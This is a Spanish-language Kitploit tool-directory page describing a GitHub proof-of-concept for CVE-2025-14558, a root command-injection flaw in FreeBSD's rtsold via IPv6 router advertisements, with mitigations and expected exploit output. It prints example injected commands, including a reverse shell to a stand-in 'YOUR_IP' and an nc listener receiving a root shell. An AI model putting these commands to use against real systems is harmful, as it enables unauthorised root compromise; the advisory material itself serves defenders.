Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Blackash-CVE-2025-14558 — CVE-2025-14558 | Kitploit
Herramientas/GitHubGitHub/rockmelodies/blackash-cve-2025-14558
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónComando y Control
GitHubrockmelodies/blackash-cve-2025-14558

Blackash-CVE-2025-14558

CVE-2025-14558

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 8 mesesAún no revisado

🚨 CVE-2025-14558 : Ejecución Remota de Código Crítica en FreeBSD (IPv6)

G8195ymXcAAjXC2

🧠 Resumen

CVE-2025-14558 es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) que afecta a los sistemas FreeBSD que utilizan servicios de solicitud de enrutador IPv6. Una falla en la forma en que se maneja la entrada de red no confiable permite a los atacantes ejecutar comandos de shell arbitrarios.


📊 Severidad

  • Puntuación CVSS v3: 9.8 / 10 🔥
  • Nivel de Riesgo: Crítico
  • Privilegios Requeridos: Ninguno
  • Interacción del Usuario: Ninguna

🎯 Componentes Afectados

  • rtsol(8)
  • rtsold(8)
  • Sistemas FreeBSD que utilizan la Autoconfiguración de Direcciones sin Estado IPv6 (SLAAC)

⚙️ Detalles Técnicos

  • Los paquetes IPv6 maliciosos de Anuncios de Enrutador (RA) pueden incluir una opción de Lista de Búsqueda de Dominios manipulada
  • La entrada se pasa de forma no segura a resolvconf(8)
  • El entrecomillado incorrecto del shell permite la inyección de comandos
  • Resulta en la ejecución arbitraria de comandos como root

🕸️ Vector de Ataque

  • 🌐 Basado en red
  • 📍 El atacante debe estar en el mismo segmento de red local
  • No se requiere autenticación ni credenciales

💥 Impacto

Si se explota con éxito, un atacante puede:

  • Obtener el compromiso total del sistema
  • Ejecutar comandos arbitrarios
  • Modificar la configuración del sistema
  • Establecer persistencia o movimiento lateral

🧪 Disponibilidad del Exploit

  • ✅ Existe una Prueba de Concepto (PoC) pública
  • Demuestra la ejecución de comandos mediante paquetes RA IPv6 manipulados

🛡️ Mitigación y Defensa

Acciones fuertemente recomendadas:

  • 🔧 Aplicar los parches de seguridad oficiales de FreeBSD
  • 🚫 Deshabilitar rtsol / rtsold si no se requiere RA IPv6
  • 🔒 Filtrar o bloquear los Anuncios de Enrutador IPv6 no confiables
  • 🧱 Usar segmentación de red para limitar la exposición al atacante local

📝 Conclusión Clave

Cualquier sistema FreeBSD que escuche anuncios de enrutador IPv6 en una red no confiable corre un alto riesgo. Parchee inmediatamente o deshabilite los servicios afectados.


Si el script PoC para CVE-2025-14558 funciona correctamente en un sistema FreeBSD vulnerable (sin parchear, con rtsold en ejecución y procesando mensajes RA IPv6):

En el Objetivo (Máquina FreeBSD Vulnerable):

  • El comando inyectado se ejecuta inmediatamente como root (ya que rtsold se ejecuta como root y llama a /sbin/resolvconf con el dominio malicioso).
  • No aparece ninguna salida visible en la consola ni en los registros por defecto (el comando se ejecuta silenciosamente en segundo plano).
  • Ejemplos de lo que sucede:
    • Para una prueba simple como --command "id > /tmp/pwned":

      • Se crea un archivo /tmp/pwned que contiene una salida como:

        root@kitploit:~
        uid=0(root) gid=0(wheel) groups=0(wheel)
        
    • Para --command "touch /tmp/exploit_success":

      • Aparece un archivo vacío /tmp/exploit_success.
    • Para una shell inversa como --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1":

      • No hay ningún cambio visible inmediato en el objetivo, pero se intenta una conexión hacia su listener.

Verifique en el objetivo con comandos como:

root@kitploit:~
ls -l /tmp/pwned
cat /tmp/pwned

En el Lado del Atacante (Ejecutando el Script):

  • El script muestra:

    root@kitploit:~
    [+] Sending malicious RA on eth0
    [+] Injected command: id > /tmp/pwned
    [+] Target must run vulnerable rtsold and process the RA
    [+] Done. Check target for execution (e.g. /tmp/pwned)
    
    
  • Para shell inversa: si tiene éxito, su nc -lvnp 4444 recibe una conexión y una shell root:

    root@kitploit:~
    listening on [any] 4444 ...
    connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
    bash: cannot set terminal process groups: No job control in this shell
    bash: no job control in this shell
    root@vulnerable-host:~ #
    

    (Ahora tiene una shell root: escriba comandos como id, whoami, etc.)

Si No Funciona:

  • No se creó ningún archivo / no hay conexión → razones: objetivo parcheado, rtsold no se está ejecutando, no está en la misma red L2, el firewall bloquea los RA o IPv6 está deshabilitado.

Esto solo es observable en un laboratorio controlado en un sistema FreeBSD vulnerable (anterior al parche del 16 de diciembre de 2025). No hay informes públicos de explotación en entornos reales al 23 de diciembre de 2025. Parchee inmediatamente en producción.


⚠️ Descargo de responsabilidad: Esta información se proporciona únicamente con fines informativos y no constituye asesoramiento de seguridad, legal u operativo. Revise y siga siempre los avisos, parches y orientación oficiales del proveedor antes de tomar acciones de remediación.

Descargar herramienta